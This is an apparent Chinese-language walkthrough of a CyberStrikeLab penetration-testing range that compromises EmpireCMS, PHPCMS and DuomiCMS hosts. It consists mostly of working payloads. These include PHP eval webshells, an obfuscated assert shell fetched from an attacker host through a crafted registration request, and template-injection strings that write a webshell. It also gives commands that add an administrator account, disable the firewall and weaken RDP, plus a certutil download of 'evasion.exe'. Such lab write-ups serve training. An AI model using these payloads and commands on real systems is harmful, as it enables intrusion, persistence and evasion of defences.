Cyberstrikelab-TengSnake

EmpireCMS

#

进入80端口发现帝国CMS，版本是7.5

<?php file_put_contents("test.php","<?php @eval(\$_POST['hack']); ?>"); ?>

然后可以蚁剑连接

PHPCMS

#

扫描一下172.20.55.32/24

[root@localhost /]# ./fscan1.8 -h 172.20.55.32/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.20.55.32    is alive
(icmp) Target 172.20.55.33    is alive
(icmp) Target 172.20.55.34    is alive
(icmp) Target 172.20.55.233   is alive
[*] Icmp alive hosts len is: 4
172.20.55.34:3306 open
172.20.55.33:3306 open
172.20.55.34:445 open
172.20.55.33:445 open
172.20.55.34:139 open
172.20.55.33:139 open
172.20.55.34:135 open
172.20.55.33:135 open
172.20.55.34:80 open
172.20.55.32:80 open
172.20.55.233:22 open
172.20.55.32:22 open
172.20.55.233:8080 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.20.55.32       code:200 len:11160  title:帝国网站管理系统 - Powered by EmpireCMS
[*] NetInfo
[*]172.20.55.33
   [->]WIN-AIHNDH3AS2F
   [->]172.20.55.33
[*] NetInfo
[*]172.20.55.34
   [->]WIN-1H68P9MF87N
   [->]172.20.55.34
   [->]10.10.10.12
[*] NetBios 172.20.55.34    WORKGROUP\WIN-1H68P9MF87N           Windows Server 2016 Datacenter 14393
[*] NetBios 172.20.55.33    WORKGROUP\WIN-AIHNDH3AS2F           Windows Server 2016 Datacenter 14393
[+] InfoScan http://172.20.55.32       [CMS]
[*] WebTitle https://172.20.55.233:8080 code:404 len:19     title:None
[*] WebTitle http://172.20.55.34       code:200 len:9657   title:PHPCMS演示站
[+] InfoScan http://172.20.55.34       [CMS]

发现172.20.55.34是PHPCMS，版本是9.6.0

POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 172.20.55.34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Origin: http://172.20.55.34
Connection: keep-alive
Referer: http://172.20.55.34/index.php?m=member&c=index&a=register&siteid=1
Cookie: PHPSESSID=0j3i6srambjce3bd66nneltjj2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

siteid=1&modelid=11&username=joe&password=123456&email=123qwe@qq.com&info[content]=<img src=http://172.16.233.2:7777/shell.txt?.php#.jpg>&dosubmit=1&protocol=

shell.txt的内容如下

<?php class  GLd4g34m{/*Fq3c66*/function __construct($x){$c=str_rot13('ffreg');/*Fq3c66*/$a= ("!"^"@").$c;/*Fq3c66*/$a($x);}}new  GLd4g34m($_REQUEST['cmd']); ?>

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

在目标 Windows 上执行以下命令，允许非 TLS、非 NLA 连接：

powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"

连接远程桌面，先把defender关掉

Mysql

#

在第一台主机的配置文件里发现了172.20.55.33的数据库配置

certutil -urlcache -f -split http://172.16.233.2:7777/evasion.exe evasion.exe 

成功上线

DuomiCms

#

扫描PHPCMS的内网

http://10.10.10.13/search.php?searchword={if:phpinfo()}phpinfo(){end

http://10.10.10.13/search.php

searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
searchtype=5&searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fwrite(fopen("test.php","w"),'<?php eval($_POST["pass"]);?>')

连接成功

Mysql

#

找到了10.10.10.14的数据库文件

IPC

#

查看10.10.10.13上的定时任务

Zerologon

#

mimikatz检测